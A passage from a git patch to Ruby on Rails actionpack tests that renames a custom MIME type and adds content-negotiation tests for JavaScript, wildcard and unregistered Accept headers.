| end 199 | end 200 | diff --git a/actionpack/test/controller/mime/respond_to_test.rb b/actionpack/test/controller/mime/respond_to_test.rb 201 | index f9ffd5f54c..a80cef83b7 100644 202 | --- a/actionpack/test/controller/mime/respond_to_test.rb 203 | +++ b/actionpack/test/controller/mime/respond_to_test.rb 204 | @@ -105,7 +105,7 @@ def made_for_content_type 205 | def custom_type_handling 206 | respond_to do |type| 207 | type.html { render body: "HTML" } 208 | - type.custom("application/crazy-xml") { render body: "Crazy XML" } 209 | + type.custom("application/fancy-xml") { render body: "Fancy XML" } 210 | type.all { render body: "Nothing" } 211 | end 212 | end 213 | @@ -294,12 +294,14 @@ def setup 214 | @request.host = "www.example.com" 215 | Mime::Type.register_alias("text/html", :iphone) 216 | Mime::Type.register("text/x-mobile", :mobile) 217 | + Mime::Type.register("application/fancy-xml", :fancy_xml) 218 | end 219 | 220 | def teardown 221 | super 222 | Mime::Type.unregister(:iphone) 223 | Mime::Type.unregister(:mobile) 224 | + Mime::Type.unregister(:fancy_xml) 225 | end 226 | 227 | def test_html 228 | @@ -455,10 +457,10 @@ def test_synonyms 229 | end 230 | 231 | def test_custom_types 232 | - @request.accept = "application/crazy-xml" 233 | + @request.accept = "application/fancy-xml" 234 | get :custom_type_handling 235 | - assert_equal "application/crazy-xml", @response.content_type 236 | - assert_equal "Crazy XML", @response.body 237 | + assert_equal "application/fancy-xml", @response.content_type 238 | + assert_equal "Fancy XML", @response.body 239 | 240 | @request.accept = "text/html" 241 | get :custom_type_handling 242 | diff --git a/actionpack/test/controller/new_base/content_negotiation_test.rb b/actionpack/test/controller/new_base/content_negotiation_test.rb 243 | index 7205e90176..6de91c57b7 100644 244 | --- a/actionpack/test/controller/new_base/content_negotiation_test.rb 245 | +++ b/actionpack/test/controller/new_base/content_negotiation_test.rb 246 | @@ -20,9 +20,19 @@ def all 247 | assert_body "Hello world */*!" 248 | end 249 | 250 | - test "Not all mimes are converted to symbol" do 251 | + test "A js or */* Accept header will return HTML" do 252 | + get "/content_negotiation/basic/hello", headers: { "HTTP_ACCEPT" => "text/javascript, */*" } 253 | + assert_body "Hello world text/html!" 254 | + end 255 | + 256 | + test "A js or */* Accept header on xhr will return HTML" do 257 | + get "/content_negotiation/basic/hello", headers: { "HTTP_ACCEPT" => "text/javascript, */*" }, xhr: true 258 | + assert_body "Hello world text/javascript!" 259 | + end 260 | + 261 | + test "Unregistered mimes are ignored" do 262 | get "/content_negotiation/basic/all", headers: { "HTTP_ACCEPT" => "text/plain, mime/another" } 263 | - assert_body '[:text, "mime/another"]' 264 | + assert_body '[:text]' 265 | end 266 | end 267 | end 268 | -- 269 | 2.21.0 270 | ``` 271 | --------------------------------------------------------------------------------